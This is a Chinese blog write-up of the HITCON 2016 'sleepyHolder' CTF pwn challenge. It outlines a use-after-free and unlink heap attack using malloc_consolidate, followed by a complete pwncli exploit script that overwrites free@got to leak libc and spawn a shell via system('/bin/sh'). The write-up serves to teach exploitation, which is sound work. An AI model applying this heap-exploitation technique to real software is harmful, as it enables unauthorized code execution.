sleepyHolder_hitcon_2016
sleepyHolder_hitcon_2016
总结
一个UAF洞,然后是常规的unlink。穿插着一个malloc_consolidation的理解,即如何构造unlink的条件。
利用过程
- 申请小的
chunk - 申请大的
chunk - 释放掉小的
chunk - 申请超大的
chunk,此时触发malloc_consolidation,得到一个小的samll bin chunk - 再次释放小的
chunk去overlap - 申请小的
chunk,布局unlink - 释放大的
chunk,触发unlink - 修改
free@got为puts@plt泄露地址 - 修改
free@got为system获取shell
Exp
from pwncli import *
cli_script()
p:tube = gift['io']
elf:ELF = gift['elf']
libc: ELF = gift['libc']
def keep(size_type:int, data:(str, bytes)):
p.sendlineafter("3. Renew secret\n", "1")
p.sendlineafter("2. Big secret\n", str(size_type))
p.sendafter("Tell me your secret: \n", data)
def swip(size_type:int):
p.sendlineafter("3. Renew secret\n", "2")
p.sendlineafter("2. Big secret\n", str(size_type))
def renew(size_type:int, data:(str, bytes)):
p.sendlineafter("3. Renew secret\n", "3")
p.sendlineafter("2. Big secret\n", str(size_type))
p.sendafter("Tell me your secret: \n", data)
def get_small(data="deadbeef\n"): keep(1, data)
def get_big(data="deadbeef\n"): keep(2, data)
def get_huge(data="deadbeef\n"): keep(3, data)
def free_small(): swip(1)
def free_big(): swip(2)
def write_small(data): renew(1, data)
def write_big(data): renew(2, data)
get_small()
get_big()
free_small()
get_huge()
free_small()
layout = [0, 0x21,
0x6020d0-0x18, 0x6020d0 - 0x10, 0x20]
get_small(flat(layout))
free_big()
write_small(flat(0, elf.got['puts'], 0, elf.got['free'], (1 << 32) + 1))
write_small(p64(elf.plt['puts']))
free_big()
libc_base_addr = u64(p.recvn(6) + b"\x00\x00") - libc.sym['puts']
log_address("libc_base_addr", libc_base_addr)
write_small(p64(libc.sym['system'] + libc_base_addr))
get_big("/bin/sh\x00")
free_big()
p.interactive()
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli
本文来自博客园,作者:LynneHuan,转载请注明原文链接:https://www.cnblogs.com/LynneHuan/p/15229806.html
浙公网安备 33010602011771号